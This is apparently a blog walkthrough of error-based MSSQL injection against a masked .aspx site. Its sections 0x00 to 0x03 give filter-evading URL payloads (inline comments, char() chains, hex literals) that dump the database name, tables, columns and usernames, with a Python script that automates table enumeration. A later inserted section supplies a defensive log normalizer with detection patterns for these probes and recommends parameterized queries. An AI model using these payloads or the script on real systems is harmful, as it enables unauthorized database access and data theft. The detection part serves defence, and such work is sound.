
Yet Another MSSQL Injection: A Walkthrough


0x00 Dumping the database name

Single quotes, spaces and a few other characters are filtered.
char() and 0x hex literals get around the quote filter (inline /**/ comments stand in for spaces in the payloads below), and the + between char() calls has to be URL-encoded as %2b.

http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,((select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=5)))--


0x01 Dumping table names

http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/name/**/from/**/jy..sysobjects/**/where/**/xtype=0x75/**/and/**/name/**/not/**/in(char(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111))))--

A quick script to enumerate the tables:

#coding:utf-8
#Author:LSA
# Pulls table names one at a time through the error-based convert(int, ...) trick:
# every name already recovered is appended to the NOT IN list, encoded as a
# char() chain so that no quotes or spaces ever appear in the request.
import re
import requests
from bs4 import BeautifulSoup

headers = {
    'Cookie': '',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'
}
# Seed value ('oooooooo' as a char() chain) so the NOT IN list is never empty.
tables_name = "char(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)"

URL_TEMPLATE = ('http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/name'
                '/**/from/**/jy..sysobjects/**/where/**/xtype=0x75/**/and/**/name/**/not/**/in({names})))--')

def deal_table_name(table_name):
    """Encode a name as char(N)%2bchar(N)... ; %2b is the URL-encoded '+'."""
    return '%2b'.join('char(%d)' % ord(c) for c in table_name)

def brute_tables(url_template):
    global tables_name
    for i in range(0, 300):
        url = url_template.format(names=tables_name)
        print(url)
        rsp = requests.get(url, headers=headers)
        soup = BeautifulSoup(rsp.text, "lxml")
        title = soup.title.string if soup.title else ''
        # The conversion error page quotes the leaked name in single quotes.
        found = re.findall(r"'(.*?)'", title or '')
        if not found:
            break  # no further name returned (or the error page changed)
        print(found[0])
        table_name = deal_table_name(found[0])
        print(table_name)
        tables_name = tables_name + ',' + table_name
    print(tables_name)

def main(url_template):
    brute_tables(url_template)

if __name__ == '__main__':
    main(URL_TEMPLATE)

0x02 Dumping column names

http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/COLUMN_NAME/**/from/**/jy.information_schema.columns/**/where/**/TABLE_NAME=char(85)%2bchar(115)%2bchar(101)%2bchar(114)%2bchar(115)/**/and/**/COLUMN_NAME/**/not/**/in(char(73)%2bchar(100))))--


0x03 Dumping data

http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/username/**/from/**/Users))--
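As an added example from the detection side (not part of the original post), here is a Python 3 normalizer that undoes the three evasions used across 0x00 to 0x03 (percent-encoding, /**/ as whitespace, and 0x or char() literals standing in for quoted strings) and then scores each query parameter against the features of these error-based probes: a catalog-table reference, convert(int, ...), an "and 1=" tail, an embedded SELECT ... FROM and a trailing comment. The access-log lines, hostnames and IPs are constructed for the example, and the indicator set and the two-hit threshold are assumptions of mine, not rules from the post.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format). Hosts and IPs are
# placeholders; lines 2 and 3 reuse the payload shapes from the walkthrough.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jul/2019:10:01:02 +0800] "GET /xxxInfo.aspx?Id=123 HTTP/1.1" 200 5120',
    '10.0.0.7 - - [12/Jul/2019:10:01:09 +0800] "GET /xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,((select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=5)))-- HTTP/1.1" 500 1200',
    '10.0.0.7 - - [12/Jul/2019:10:01:15 +0800] "GET /xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/name/**/from/**/jy..sysobjects/**/where/**/xtype=0x75/**/and/**/name/**/not/**/in(char(111)%2bchar(111)%2bchar(111))))-- HTTP/1.1" 500 1200',
    '10.0.0.9 - - [12/Jul/2019:10:02:00 +0800] "GET /xxxInfo.aspx?Id=42&sort=name HTTP/1.1" 200 5120',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
COMMENT_RE = re.compile(r'/\*.*?\*/', re.S)
HEX_RE = re.compile(r'\b0x([0-9a-fA-F]+)\b')
CHAR_RE = re.compile(r'char\((\d+)\)', re.I)
CHAR_CHAIN_RE = re.compile(r'(?:char\(\d+\)\s*\+\s*)*char\(\d+\)', re.I)

# One indicator per feature of the error-based probes shown above (assumed set).
INDICATORS = {
    'catalog_probe': re.compile(r'\b(sysobjects|sysdatabases|syscolumns|information_schema\.\w+)\b', re.I),
    'error_based_cast': re.compile(r'\bconvert\s*\(\s*int\s*,', re.I),
    'boolean_tail': re.compile(r'\b(and|or)\s+\d+\s*=', re.I),
    'subselect': re.compile(r'\bselect\b.+\bfrom\b', re.I | re.S),
    'comment_terminator': re.compile(r'--\s*$'),
}
# Raw-form markers of the evasions themselves, checked before normalization.
EVASION_RE = re.compile(r'/\*|char\(|\b0x[0-9a-f]+', re.I)


def _hex_literal(m):
    """0x7573 -> 'us' when the bytes are printable ASCII, otherwise leave as-is."""
    try:
        text = bytes.fromhex(m.group(1)).decode('ascii')
    except (ValueError, UnicodeDecodeError):
        return m.group(0)
    return "'" + text + "'" if text.isprintable() else m.group(0)


def _char_chain(m):
    """char(85)+char(115) -> 'Us' when every code point is printable ASCII."""
    codes = [int(c) for c in CHAR_RE.findall(m.group(0))]
    if codes and all(32 <= c < 127 for c in codes):
        return "'" + ''.join(chr(c) for c in codes) + "'"
    return m.group(0)


def normalize(value):
    """Undo what a quote/space blacklist lets through: percent-encoding
    (%2b -> +), /**/ used as whitespace, and 0x / char() in place of quoted
    strings. Decoding is bounded so double-encoding cannot loop forever."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = COMMENT_RE.sub(' ', value)
    value = HEX_RE.sub(_hex_literal, value)
    value = CHAR_CHAIN_RE.sub(_char_chain, value)
    return re.sub(r'\s+', ' ', value).strip()


def analyze_param(raw_value):
    """Return (normalized value, sorted indicator names) for one parameter."""
    norm = normalize(raw_value)
    hits = sorted(k for k, rx in INDICATORS.items() if rx.search(norm))
    if EVASION_RE.search(raw_value):
        hits.append('evasion_markers')
    return norm, hits


def scan(lines, min_hits=2):
    """Flag requests whose normalized parameters show at least min_hits
    indicators. Returns one finding per (line, parameter)."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m or '?' not in m.group('target'):
            continue
        query = m.group('target').split('?', 1)[1]
        for pair in query.split('&'):
            # partition on the first '=' only: the payload itself contains '='
            name, _, raw_value = pair.partition('=')
            norm, hits = analyze_param(raw_value)
            if len(hits) >= min_hits:
                findings.append({'line': lineno, 'param': name,
                                 'normalized': norm, 'indicators': hits})
    return findings


if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']} param {f['param']}: {f['indicators']}\n  {f['normalized']}")
```

The point of normalizing before matching is that a blacklist on the raw request sees neither a quote nor a space in these payloads; after decoding, `char(85)%2bchar(115)%2bchar(101)%2bchar(114)%2bchar(115)` reads as `'Users'` and `xtype=0x75` as `xtype='u'`, and the SQL shape is plain to any rule. The same reasoning applies server-side: the durable fix is a parameterized query for `Id`, not a longer character blacklist.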


0x04 Closing notes

When working an injection, make full use of the database's own catalog tables: for MSSQL, sysobjects and information_schema; for MySQL, information_schema; for Oracle, dual, user_tables, all_objects, user_tab_columns, all_tab_columns, all_tables, and so on.
